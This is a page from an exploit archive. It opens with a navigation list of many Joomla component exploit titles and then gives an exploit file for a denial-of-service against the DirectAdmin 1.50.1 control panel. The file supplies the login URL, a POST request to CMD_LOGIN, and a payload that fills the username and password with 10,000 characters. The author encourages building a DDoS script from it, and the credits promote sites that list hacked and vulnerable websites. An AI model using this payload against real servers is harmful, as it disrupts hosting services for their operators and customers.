574c0f2df8
5 new exploits DirectAdmin 1.50.1 - Denial of Service Joomla! Component 'com_menu' - SQL Injection Joomla! Component com_menu - SQL Injection Joomla! Component 'com_pcchess' - Local File Inclusion Joomla! Component 'com_huruhelpdesk' - SQL Injection Joomla! Component com_pcchess - Local File Inclusion Joomla! Component huruhelpdesk - SQL Injection Joomla! Component 'com_ca' - SQL Injection Joomla! Component com_ca - SQL Injection Joomla! Component 'com_education_classess' - SQL Injection Joomla! Component education - SQL Injection Joomla! Component 'com_Flashgames' - Local File Inclusion Joomla! Component FlashGames 1.5.0 - Local File Inclusion Joomla! Component 'com_cvmaker' - Local File Inclusion Joomla! Component 'com_myfiles' - Local File Inclusion Joomla! Component CV Maker 1.0 - Local File Inclusion Joomla! Component My Files 1.0 - Local File Inclusion Joomla! Component 'com_joommail' - Local File Inclusion Joomla! Component 'com_memory' - Local File Inclusion Joomla! Component JoomMail 1.0 - Local File Inclusion Joomla! Component Memory Book 1.2 - Local File Inclusion Joomla! Component 'com_diary' - Local File Inclusion Joomla! Component Digital Diary 1.5.0 - Local File Inclusion Joomla! Component 'com_jdrugstopics' - SQL Injection Joomla! Component com_jdrugstopics - SQL Injection Joomla! Component 'com_flexicontent' - Local File Joomla! Component FLEXIcontent 1.5 - Local File Inclusion Joomla! Component 'com_delicious' - Local File Inclusion Joomla! Component Delicious Bookmarks 0.0.1 - Local File Inclusion Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection Joomla! Component 'com_pandafminigames' - SQL Injection Joomla! Component com_pandafminigames - SQL Injection Joomla! Component 'com_caddy' - Exploit Joomla! Component com_caddy - Exploit Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload Joomla! Component com_jesectionfinder - Arbitrary File Upload Joomla! Component 'com_camp' - SQL Injection Joomla! Component com_camp - SQL Injection Joomla! Component 'com_crowdsource' - SQL Injection Joomla! Component 'com_event' - Multiple Vulnerabilities Joomla! Component com_crowdsource - SQL Injection Joomla! Component com_event - Multiple Vulnerabilities Joomla! Component 'com_event' - SQL Injection Joomla! Component com_event - SQL Injection Joomla! Component 'com_packages' - SQL Injection Joomla! Component com_packages - SQL Injection Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection Joomla! Component JE Poll - 'pollid' Parameter SQL Injection Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection Joomla! Component 'com_chronocontact' - Blind SQL Injection Joomla! Component ChronoConnectivity - Blind SQL Injection Joomla! Component ChronoForms - Blind SQL Injection Joomla! Component 'com_lead' - SQL Injection Joomla! Component com_lead - SQL Injection Joomla! Component 'com_cinema' - SQL Injection Joomla! Component cinema - SQL Injection Joomla! Component 'com_jstore' - SQL Injection Joomla! Component 'com_jtickets' - SQL Injection Joomla! Component 'com_jcommunity' - SQL Injection Joomla! Component 'com_jmarket' - SQL Injection Joomla! Component 'com_jsubscription' - SQL Injection Joomla! Component com_jstore - SQL Injection Joomla! Component com_jtickets - SQL Injection Joomla! Component com_jcommunity - SQL Injection Joomla! Component com_jmarket - SQL Injection Joomla! Component com_jsubscription - SQL Injection Joomla! Component 'com_jnewsletter' - SQL Injection Joomla! Component com_jnewsletter - SQL Injection Joomla! Component 'com_joomdocs' - Cross-Site Scripting Joomla! Component com_joomdocs - Cross-Site Scripting Joomla! Component 'com_community' - Persistent Cross-Site Scripting Joomla! Component 'com_jomestate' - Remote File Inclusion Joomla! Component com_community - Persistent Cross-Site Scripting Joomla! Component com_jomestate - Remote File Inclusion Joomla! Component 'com_jejob' - Local File Inclusion Joomla! Component com_jejob - Local File Inclusion Joomla! Component 'com_dateconverter' 0.1 - SQL Injection Joomla! Component com_dateconverter 0.1 - SQL Injection Joomla! Component 'com_phocagallery' - SQL Injection Joomla! Component Phoca Gallery 2.7.3 - SQL Injection Joomla! Component 'com_jpodium' - SQL Injection Joomla! Component JPodium 2.7.3 - SQL Injection Joomla! Component 'com_jomtube' - 'user_id' Parameter Blind SQL Injection Joomla! Component com_jomtube - 'user_id' Parameter Blind SQL Injection Joomla! Component 'com_myhome' - Blind SQL Injection Joomla! Component 'com_mysms' - Arbitrary File Upload Joomla! Component MyHome - Blind SQL Injection Joomla! Component MySMS - Arbitrary File Upload Joomla! Component 'com_iproperty' - SQL Injection Joomla! Component com_iproperty - SQL Injection Joomla! Component 'com_itarmory' - SQL Injection Joomla! Component com_itarmory - SQL Injection Joomla! Component 'com_neorecruit' 1.4 - SQL Injection Joomla! Component NeoRecruit 1.4 - SQL Injection Joomla! Component 'com_equipment' - SQL Injection Joomla! Component com_equipment - SQL Injection Joomla! Component 'com_Fabrik' - SQL Injection Joomla! Component 'com_extcalendar' - Blind SQL Injection Joomla! Component Fabrik - SQL Injection Joomla! Component com_extcalendar - Blind SQL Injection Joomla! Component 'com_jejob' - SQL Injection Joomla! Component JE Job - SQL Injection Joomla! Component 'com_jfuploader' < 2.12 - Arbitrary File Upload Joomla! Component com_jfuploader < 2.12 - Arbitrary File Upload Joomla! Component 'com_connect' - Local File Inclusion Joomla! Component 'com_dcnews' - Local File Inclusion Joomla! Component com_connect - Local File Inclusion Joomla! Component com_dcnews - Local File Inclusion Joomla! Component 'com_clan' - SQL Injection Joomla! Component com_clan - SQL Injection Joomla! Component 'com_clanlist' - SQL Injection Joomla! Component com_clanlist - SQL Injection Joomla! Component 'com_markt' - SQL Injection Joomla! Component 'com_img' - Local File Inclusion Joomla! Component com_markt - SQL Injection Joomla! Component com_img - Local File Inclusion Joomla! Component 'com_ccboard' 1.2-RC - Multiple Vulnerabilities Joomla! Component CCBoard 1.2-RC - Multiple Vulnerabilities Joomla! Component 'com_maianmedia' - SQL Injection Joomla! Component com_maianmedia - SQL Injection Joomla! Component 'com_idoblog' - SQL Injection Joomla! Component com_idoblog - SQL Injection Joomla! Component 'com_people' 1.0.0 - SQL Injection Joomla! Component People 1.0.0 - SQL Injection Joomla! Component 'com_people' 1.0.0 - Local File Inclusion Joomla! Component com_people 1.0.0 - Local File Inclusion Joomla! Component 'com_jce' - Blind SQL Injection Joomla! Component joomlacontenteditor - Blind SQL Injection Joomla! Component 'com_hello' - SQL Injection Joomla! Component com_hello - SQL Injection Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload Joomla! Component jDownloads 1.0 - Arbitrary File Upload Joomla! Component 'com_jesubmit' - Local File Inclusion Joomla! Component JE Story Submit - Local File Inclusion Joomla! Component 'com_obSuggest' - Local File Inclusion Joomla! Component obSuggest - Local File Inclusion Joomla! Component 'com_jdirectory' - SQL Injection Joomla! Component com_jdirectory - SQL Injection Joomla! Component 'com_esearch' - SQL Injection Joomla! Component Search 3.0.0 - SQL Injection Joomla! Component 'com_joomtouch' - Local File Inclusion Joomla! Component JoomTouch 1.0.2 - Local File Inclusion Joomla! Component 'com_jce' 2.0.10 - Multiple Vulnerabilities Joomla! Component joomlacontenteditor 2.0.10 - Multiple Vulnerabilities Joomla! Component 'com_horses' - 'id' Parameter SQL Injection Joomla! Component com_horses - 'id' Parameter SQL Injection Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion Joomla! Component 'com_jigsaw' - 'Controller' Parameter Directory Traversal Joomla! Component com_jigsaw - 'Controller' Parameter Directory Traversal Joomla! Component 'com_fireboard' - 'Itemid' Parameter SQL Injection Joomla! Component com_fireboard - 'Itemid' Parameter SQL Injection Joomla! Component 'com_dirfrm' - Multiple SQL Injections Joomla! Component com_dirfrm - Multiple SQL Injections Joomla! Component 'com_catalogue' - SQL Injection / Local File Inclusion Joomla! Component Catalogue - SQL Injection / Local File Inclusion Joomla! Component 'com_jeformcr' - 'id' Parameter SQL Injection Joomla! Component 'com_jesectionfinder' - 'sf_id' Parameter SQL Injection Joomla! Component Jeformcr - 'id' Parameter SQL Injection Joomla! Component JExtensions Property Finder - 'sf_id' Parameter SQL Injection Joomla! Component 'com_mailto' - Multiple Cross-Site Scripting Vulnerabilities Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities Joomla! Component 'com_classified' - SQL Injection Joomla! Component Classified - SQL Injection Joomla! Component 'com_frontenduseraccess' - Local File Inclusion Joomla! Component com_frontenduseraccess - Local File Inclusion Joomla! Component 'com_clan_members' - 'id' Parameter SQL Injection Joomla! Component com_clan_members - 'id' Parameter SQL Injection Joomla! Component 'com_phocadownload' - Local File Inclusion Joomla! Component com_phocadownload - Local File Inclusion Joomla! Component 'com_cbcontact' - 'contact_id' Parameter SQL Injection Joomla! Component com_cbcontact - 'contact_id' Parameter SQL Injection Joomla! Component 'com_maplocator' - 'cid' Parameter SQL Injection Joomla! Component Map Locator - 'cid' Parameter SQL Injection Joomla! Component 'com_ccboard' - SQL Injection / Arbitrary File Upload Joomla! Component CCBoard - SQL Injection / Arbitrary File Upload Joomla! Component 'com_morfeoshow' - 'idm' Parameter SQL Injection Joomla! Component com_morfeoshow - 'idm' Parameter SQL Injection Joomla! Component 'com_jr_tfb' - 'Controller' Parameter Local File Inclusion Joomla! Component com_jr_tfb - 'Controller' Parameter Local File Inclusion Joomla! Component 'com_foto' - 'id_categoria' Parameter SQL Injection Joomla! Component 'com_juicy' - 'picId' Parameter SQL Injection Joomla! Component 'com_hospital' - SQL Injection Joomla! Component 'com_controller' - 'Itemid' Parameter SQL Injection Joomla! Component Foto - 'id_categoria' Parameter SQL Injection Joomla! Component Juicy Gallery - 'picId' Parameter SQL Injection Joomla! Component com_hospital - SQL Injection Joomla! Component Controller - 'Itemid' Parameter SQL Injection Joomla! Component 'com_newssearch' - SQL Injection Joomla! Component com_newssearch - SQL Injection Joomla! Component 'com_community' - 'userid' Parameter SQL Injection Joomla! Component com_community - 'userid' Parameter SQL Injection Joomla! Component 'com_biitatemplateshop' - 'groups' Parameter SQL Injection Joomla! Component Biitatemplateshop - 'groups' Parameter SQL Injection Joomla! Component 'com_expedition' - 'id' Parameter SQL Injection Joomla! Component com_expedition - 'id' Parameter SQL Injection Joomla! Component 'com_br' - 'state_id' Parameter SQL Injection Joomla! Component com_br - 'state_id' Parameter SQL Injection Joomla! Component 'com_caproductprices' - 'id' Parameter SQL Injection Joomla! Component com_caproductprices - 'id' Parameter SQL Injection Joomla! Component 'com_br' - 'Controller' Parameter Local File Inclusion Joomla! Component com_br - 'Controller' Parameter Local File Inclusion Joomla! Component 'com_full' - 'id' Parameter SQL Injection Joomla! Component Full - 'id' Parameter SQL Injection Joomla! Component 'com_boss' - 'Controller' Parameter Local File Inclusion Joomla! Component 'com_car' - Multiple SQL Injections Joomla! Component com_boss - 'Controller' Parameter Local File Inclusion Joomla! Component com_car - Multiple SQL Injections Joomla! Component 'com_bulkenquery' - 'Controller' Parameter Local File Inclusion Joomla! Component com_bulkenquery - 'Controller' Parameter Local File Inclusion Joomla! Component 'com_jesubmit' - 'index.php' Arbitrary File Upload Joomla! Component JE Story Submit - 'index.php' Arbitrary File Upload Joomla! Component 'com_motor' - 'cid' Parameter SQL Injection Joomla! Component com_motor - 'cid' Parameter SQL Injection Joomla! Component 'com_firmy' - 'Id' Parameter SQL Injection Joomla! Component 'com_crhotels' - 'catid' Parameter SQL Injection Joomla! Component com_firmy - 'Id' Parameter SQL Injection Joomla! Component com_crhotels - 'catid' Parameter SQL Injection Joomla! Component 'com_cmotour' - 'id' Parameter SQL Injection Joomla! Component com_cmotour - 'id' Parameter SQL Injection Joomla! Component 'com_bnf' - 'seccion_id' Parameter SQL Injection Joomla! Component com_bnf - 'seccion_id' Parameter SQL Injection Joomla! Component 'com_machine' - Multiple SQL Injections Joomla! Component Machine - Multiple SQL Injections Joomla! Component 'com_joomsport' - SQL Injection / Arbitrary File Upload Joomla! Component Joomsport - SQL Injection / Arbitrary File Upload Joomla! Component 'com_dv' - 'upload.php' Arbitrary File Upload Joomla! Component DentroVideo 1.2 - 'upload.php' Arbitrary File Upload Joomla! Component 'com_hwdvideoshare' - 'flash_upload.php' Arbitrary File Upload Joomla! Component hwdVideoShare - 'flash_upload.php' Arbitrary File Upload Joomla! Component 'com_maianmedia' - 'uploadhandler.php' Arbitrary File Upload Joomla! Component 'com_jcalpro' - SQL Injection Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload Joomla! Component JCal Pro Calendar - SQL Injection Joomla! Component 'com_hello' - 'Controller' Parameter Local File Inclusion Joomla! Component com_hello - 'Controller' Parameter Local File Inclusion Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection Joomla! Component Odudeprofile 2.8 - 'profession' Parameter SQL Injection Joomla! Component 'com_civicrm' - Multiple Arbitrary File Upload Vulnerabilities Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities Joomla! Component 'com_parcoauto' - 'idVeicolo' Parameter SQL Injection Joomla! Component Parcoauto - 'idVeicolo' Parameter SQL Injection Joomla! Component 'com_jvideoclip' - 'uid' Parameter SQL Injection Joomla! Component JVideoClip 1.5.1 - 'uid' Parameter SQL Injection Joomla! Component 'com_maian15' - 'name' Parameter Arbitrary File Upload Joomla! Component Maian15 - 'name' Parameter Arbitrary File Upload Joomla! Component 'com_inneradmission' - 'index.php' SQL Injection Joomla! Component Inneradmission - 'index.php' SQL Injection Joomla! Component 'com_easy_youtube_gallery' 1.0.2 - SQL Injection Joomla! Component Easy Youtube Gallery 1.0.2 - SQL Injection Joomla! Component 'com_payplans' 3.3.6 - SQL Injection Joomla! Component com_payplans 3.3.6 - SQL Injection Joomla! Component 'com_enmasse' 5.1 < 6.4 - SQL Injection Joomla! Component com_enmasse 5.1 < 6.4 - SQL Injection Joomla! Component 'com_bt_media' - SQL Injection Joomla! Component com_bt_media 1.0 - SQL Injection Joomla! Component 'com_guru' - SQL Injection Joomla! Component Guru Pro - SQL Injection DirectAdmin 1.50.1 - Denial of Service Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting My Link Trader 1.1 - Authentication Bypass My Php Dating 2.0 - 'path' Parameter SQL Injection My Php Dating 2.0 - 'id' Parameter SQL Injection
70 lines
No EOL
2.5 KiB
Text
Executable file
70 lines
No EOL
2.5 KiB
Text
Executable file
#################################
|
|
|
|
#
|
|
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
|
|
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
|
|
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
|
|
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
|
|
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
|
|
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
|
|
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
|
|
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
|
|
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
|
|
#
|
|
|
|
#####################################
|
|
|
|
#####################################
|
|
|
|
# Iranian Exploit DataBase
|
|
|
|
# Directadmin ControlPanel 1.50.1 denial of service Vulnerability
|
|
|
|
# Directadmin Version : 1.50.1 And Old Version
|
|
|
|
# Testet On : Centos 6 - Directadmin 1.50.1
|
|
|
|
# Vendor site : http://www.directadmin.com
|
|
|
|
# Author : Amir ( iedb.team@gmail.com - https://telegram.me/AmirAm67)
|
|
|
|
# Site : Www.IeDb.Ir - irist.ir - xssed.Ir
|
|
|
|
# Iedb Telegram : https://telegram.me/iedbteam
|
|
|
|
# Archive Exploit = http://www.iedb.ir/exploits-6517.html
|
|
|
|
#####################################
|
|
|
|
Description :
|
|
|
|
An attacker can send a username and password in the login screen DirectAdmin long,DirectAdmin to disrupt And Crach.
|
|
This problem is present in all versions of DirectAdmin.
|
|
There is no limit on the number of characters entered.
|
|
attacker could write a script to attack DDoS based on the following information:
|
|
|
|
http://Ip:2222/CMD_LOGIN
|
|
|
|
POST /CMD_LOGIN HTTP/1.1
|
|
|
|
referer=%2F&username=$POC&password=$POC
|
|
|
|
$POC = A * 10000
|
|
|
|
#####################################
|
|
|
|
** http://iedb.ir ==>> Iranian Exploit DataBase And Iranian Security Team
|
|
|
|
** http://irist.ir ==>> Register hacked sites
|
|
|
|
** http://xssed.Ir ==>> Sign vulnerable sites ( xss and sql ) (Vulnerability attack information site)
|
|
|
|
Thanks to : C0dex,B3hz4d,Beni_vanda,Mr_time,Bl4ck M4n,black_security,Yasser,Ramin Assadian,Black_Nofuzi,SecureHost,1TED,Mr_Kelever,Mr_keeper,Mahmod,Iedb,Khashayar,B3hz4d4,Shabgard,Cl09er,Ramin Asadyan,
|
|
|
|
Be_lucky,Moslem Haghighian,Dr_Iman,8Bit,Javid,Esmiley_Amir,Mahdi_feizezade,Amin_Zohrabi,Shellshock3 And all my friends And All Member In Iedb.Ir Team
|
|
|
|
#####################################
|
|
|
|
# Archive Exploit = http://www.iedb.ir/exploits-6517.html
|
|
|
|
##################################### |